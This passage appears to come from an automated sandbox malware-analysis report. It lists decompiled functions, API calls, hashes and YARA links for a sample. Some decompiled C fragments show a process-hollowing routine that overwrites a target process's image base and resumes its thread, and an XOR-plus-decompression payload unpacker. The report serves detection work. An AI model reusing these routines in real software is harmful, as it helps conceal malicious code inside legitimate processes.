                                                                                                                                                    • Instruction Fuzzy Hash: C811A3332546053EB79076B4AC85EAB316B9BC6777F340328FD24962E2ED31CD0E8624
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00650BD2, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00637453,00650D05,?,?,0064E5D9), ref: 00650BD7
                                                                                                                                                    • _free.LIBCMT ref: 00650C34
                                                                                                                                                    • _free.LIBCMT ref: 00650C6A
                                                                                                                                                    • SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,00637453,00650D05,?,?,0064E5D9), ref: 00650C75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                    • Opcode ID: d63f2762fef5797a499463b6bb3cc9db97fc456fcc76ff855a9d8cf218f069ed
                                                                                                                                                    • Instruction ID: 446510d090c52415a49927515d6907c1efa6bfdfa5b1bcbee1110902ae3d1596
                                                                                                                                                    • Opcode Fuzzy Hash: d63f2762fef5797a499463b6bb3cc9db97fc456fcc76ff855a9d8cf218f069ed
                                                                                                                                                    • Instruction Fuzzy Hash: 9511C6722542013AA75036B4AC85EAB756BABC7777F350328FD25962E1ED31CD0D8624
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612B60, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612B60(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v20;
				char _v24;

				_v12 = 0xffffffff;
				if(E00612B20(__ecx, _a4) != 0) {
					if(E00612C20( &_v8,  &_v16) != 0) {
						if(E00613250(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E006137C0(_v8, _v16, _v24, _v20) == 1) {
							_v12 = GetProcessId(_v8);
						}
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v16);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}








                                                                                                                                                    0x00612b66
                                                                                                                                                    0x00612b7b
                                                                                                                                                    0x00612b96
                                                                                                                                                    0x00612bbc
                                                                                                                                                    0x00612be5
                                                                                                                                                    0x00612be5
                                                                                                                                                    0x00612bec
                                                                                                                                                    0x00612bf4
                                                                                                                                                    0x00612bf4
                                                                                                                                                    0x00612bfe
                                                                                                                                                    0x00612c08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612c0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612b98
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 08cdd0f1b37b9629246d39be3f9fc53661f83ed476137782ca4e69b4613ee695
                                                                                                                                                    • Instruction ID: c05cb5aaffb189fc64a5be5ae4b53ee8581c82869b8dd8923b30cf06fc475c7f
                                                                                                                                                    • Opcode Fuzzy Hash: 08cdd0f1b37b9629246d39be3f9fc53661f83ed476137782ca4e69b4613ee695
                                                                                                                                                    • Instruction Fuzzy Hash: 29213EBAD0420ABBCB00DFE4DD959EE777AAB58315F148648FA15D3240E630EB909B60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006137C0, Relevance: 6.1, APIs: 4, Instructions: 51threadinjectionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006137C0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;

				_v720.ContextFlags = 0x10002;
				E006114A0( &(_v720.Dr0), 0, 0x2c8);
				if(GetThreadContext(_a8,  &_v720) != 0) {
					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
						_v720.Eax = _a16;
						if(SetThreadContext(_a8,  &_v720) != 0) {
							ResumeThread(_a8);
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}




                                                                                                                                                    0x006137c9
                                                                                                                                                    0x006137e1
                                                                                                                                                    0x006137fc
                                                                                                                                                    0x00613820
                                                                                                                                                    0x00613829
                                                                                                                                                    0x00613842
                                                                                                                                                    0x0061384c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613852
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613844
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00613822
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadContext.KERNEL32(00611EAF,00010002), ref: 006137F4
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 00613818
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextMemoryProcessThreadWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2099319263-0
                                                                                                                                                    • Opcode ID: 1b487940bde5e85e8aac3f4b08e1b81f2eeaf3393c51e60293956319396f13e7
                                                                                                                                                    • Instruction ID: 595f4250ee718cde756c7293a2b23a3b71c1ef95c440b0b5f3e585b820894992
                                                                                                                                                    • Opcode Fuzzy Hash: 1b487940bde5e85e8aac3f4b08e1b81f2eeaf3393c51e60293956319396f13e7
                                                                                                                                                    • Instruction Fuzzy Hash: 34116175605119ABDB50DF61EC49FEE37A9AF08705F14C558FA0ED7240EA70DA80CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00667631, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0066764B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00667657
                                                                                                                                                      • Part of subcall function 00667700: CloseHandle.KERNEL32(006A99C0,0066774A,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001), ref: 00667710
                                                                                                                                                    • ___initconout.LIBCMT ref: 00667667
                                                                                                                                                      • Part of subcall function 006676C2: CreateFileW.KERNEL32(00694B74,40000000,00000003,00000000,00000003,00000000,00000000,006676F1,006663F6,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 006676D5
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0066767B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 99e7b9a599d5283a0df5e08bb79ba5fede4e755aea57356cc112cb8a74e1aba6
                                                                                                                                                    • Instruction ID: f339a806e88083f2c0bb19f210ce8960da8d90dce6f68f9f5fa587a816ac0fb9
                                                                                                                                                    • Opcode Fuzzy Hash: 99e7b9a599d5283a0df5e08bb79ba5fede4e755aea57356cc112cb8a74e1aba6
                                                                                                                                                    • Instruction Fuzzy Hash: D5F0FE36104601BFCB622B9ADC089467FA7FB89761B555419F59982530CE32A851DF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00667717, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0065CDC4,00000000,?,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001), ref: 0066772E
                                                                                                                                                    • GetLastError.KERNEL32(?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001,?,006650C3,0065CB6B), ref: 0066773A
                                                                                                                                                      • Part of subcall function 00667700: CloseHandle.KERNEL32(006A99C0,0066774A,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000,00000001), ref: 00667710
                                                                                                                                                    • ___initconout.LIBCMT ref: 0066774A
                                                                                                                                                      • Part of subcall function 006676C2: CreateFileW.KERNEL32(00694B74,40000000,00000003,00000000,00000003,00000000,00000000,006676F1,006663F6,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 006676D5
                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,0065CDC4,00000000,?,00666409,?,00000001,?,00000001,?,00664B5E,00000000,?,00000001,00000000), ref: 0066775F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 9dbd321b92a71ff442739a5e66a54e120d5bcef84d741e89001fb9dba3457280
                                                                                                                                                    • Instruction ID: 35e2cf067cb102a5a358930b7c7354032ca8da7238459e5cbe8521e4897df719
                                                                                                                                                    • Opcode Fuzzy Hash: 9dbd321b92a71ff442739a5e66a54e120d5bcef84d741e89001fb9dba3457280
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0C936905219BFCF622F95DC08A9A3F27FB097A5F545114FE1896230CA329920DFE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064CEC8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID: -
                                                                                                                                                    • API String ID: 269201875-2547889144
                                                                                                                                                    • Opcode ID: 0e6801b890b216fbe3dfe40953a766bbcb3b026a37ce68e05ad28b22223c40bb
                                                                                                                                                    • Instruction ID: 5a384bec653da9e85ad9086748cf290d4a41dac7893d6de5198e60836663bd68
                                                                                                                                                    • Opcode Fuzzy Hash: 0e6801b890b216fbe3dfe40953a766bbcb3b026a37ce68e05ad28b22223c40bb
                                                                                                                                                    • Instruction Fuzzy Hash: A2C1E171D002169ADF64AF64CC41BEA73BBEF15714F1440AEE905A7381EB71DE85CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064F2B1, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: +$-
                                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                                    • Opcode ID: 3cc04fdda4eed2840bf348f5c288387c1a3f141f6f1c321de9e830a82e15bed4
                                                                                                                                                    • Instruction ID: 45fbc8c5cc5c0d70c36f54c3e849467ac4cb3ca3a86b2c984c431a181f06e9a3
                                                                                                                                                    • Opcode Fuzzy Hash: 3cc04fdda4eed2840bf348f5c288387c1a3f141f6f1c321de9e830a82e15bed4
                                                                                                                                                    • Instruction Fuzzy Hash: 4B910530D042499FDF25CF68D8906FEBBF3EF51320F14826AE871A7392D67099068B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0062F170, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0062F1A3
                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0062F25C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                    • String ID: csm
                                                                                                                                                    • API String ID: 3480331319-1018135373
                                                                                                                                                    • Opcode ID: 1b7d3e40905dd3036929ba6f3727841ad59fce390427ada4078b55f2c934ab4f
                                                                                                                                                    • Instruction ID: 6e903627e82faea63a7ca1c31249582c23e3a359d553e277fef56f75021be77d
                                                                                                                                                    • Opcode Fuzzy Hash: 1b7d3e40905dd3036929ba6f3727841ad59fce390427ada4078b55f2c934ab4f
                                                                                                                                                    • Instruction Fuzzy Hash: 33410134E01628DBCF10DFA8E844ADEBBB6AF46314F148179E8156B352D7319E15CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00624F77, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3___cftoe
                                                                                                                                                    • String ID: !%x
                                                                                                                                                    • API String ID: 855520168-1893981228
                                                                                                                                                    • Opcode ID: 9bb46d13d8fc20098614fde50dfe97496352f0fdb08c52e27c679da382d2ea06
                                                                                                                                                    • Instruction ID: f089c2464f327cfce30e8179c8056a1767b66554f93cdbcc8b57bd767dbaad94
                                                                                                                                                    • Opcode Fuzzy Hash: 9bb46d13d8fc20098614fde50dfe97496352f0fdb08c52e27c679da382d2ea06
                                                                                                                                                    • Instruction Fuzzy Hash: 32214835D01259EBCF04DF90E981AEEBBB6BF48304F104119F915A7241E7756A16CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00628D49, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3___cftoe
                                                                                                                                                    • String ID: !%x
                                                                                                                                                    • API String ID: 855520168-1893981228
                                                                                                                                                    • Opcode ID: 918de267cd4bec048f804b69e80d69839dd3b877330a440ece2c9daecc3a5f4c
                                                                                                                                                    • Instruction ID: df082c59533e490263d5ce95cc1e88d69a6a73bd5b526a4765587f9d27daf413
                                                                                                                                                    • Opcode Fuzzy Hash: 918de267cd4bec048f804b69e80d69839dd3b877330a440ece2c9daecc3a5f4c
                                                                                                                                                    • Instruction Fuzzy Hash: 50216B31911269EFDF01DF94EC41AEEBBB2BF69300F184059F9416B242D7755A09CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00611D20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00611D20(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				void* _v12;
				long _v16;
				char _v20;
				void* _t33;
				void* _t66;
				void* _t67;

				_t1 =  &_a12; // 0x61234a
				_t33 = E00611390( *_t1);
				_t67 = _t66 + 4;
				_v12 = _t33;
				_v8 = 8;
				while(_v8 < _a8) {
					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
					_v8 = _v8 + 1;
				}
				_t19 =  &_v20; // 0x61234a
				_t22 =  &_a12; // 0x61234a
				_v16 = RtlDecompressBuffer(2, _v12,  *_t22, _a4 + 8, _a8 - 8, _t19);
				if(_v16 == 0) {
					_t26 =  &_v20; // 0x61234a
					E00611450(_a4, _v12,  *_t26);
					_t67 = _t67 + 0xc;
				}
				E006113D0(_v12);
				if(_v16 != 0) {
					return 0;
				}
				_t31 =  &_v20; // 0x61234a
				return  *_t31;
			}










                                                                                                                                                    0x00611d26
                                                                                                                                                    0x00611d2a
                                                                                                                                                    0x00611d2f
                                                                                                                                                    0x00611d32
                                                                                                                                                    0x00611d35
                                                                                                                                                    0x00611d47
                                                                                                                                                    0x00611d73
                                                                                                                                                    0x00611d44
                                                                                                                                                    0x00611d44
                                                                                                                                                    0x00611d77
                                                                                                                                                    0x00611d89
                                                                                                                                                    0x00611d99
                                                                                                                                                    0x00611da0
                                                                                                                                                    0x00611da2
                                                                                                                                                    0x00611dae
                                                                                                                                                    0x00611db3
                                                                                                                                                    0x00611db3
                                                                                                                                                    0x00611dba
                                                                                                                                                    0x00611dc6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611dcd
                                                                                                                                                    0x00611dc8
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • RtlDecompressBuffer.NTDLL(00000002,?,J#a,?,004FFFF8,J#a), ref: 00611D93
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateBufferDecompressProcess
                                                                                                                                                    • String ID: J#a$J#a
                                                                                                                                                    • API String ID: 2896260840-2386348796
                                                                                                                                                    • Opcode ID: 773e64657e8491cb779398e84687d0bc9d97e56eaad174b309be9195b8d597b2
                                                                                                                                                    • Instruction ID: a24b674c71a751f5db9ced4457a9f2f954f4d7925bed0f458a87bc509d2c165d
                                                                                                                                                    • Opcode Fuzzy Hash: 773e64657e8491cb779398e84687d0bc9d97e56eaad174b309be9195b8d597b2
                                                                                                                                                    • Instruction Fuzzy Hash: 74214F70E04148EFCB04DF98D891AFEB7B6EF49304F18859CFA199B341D634AA80CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%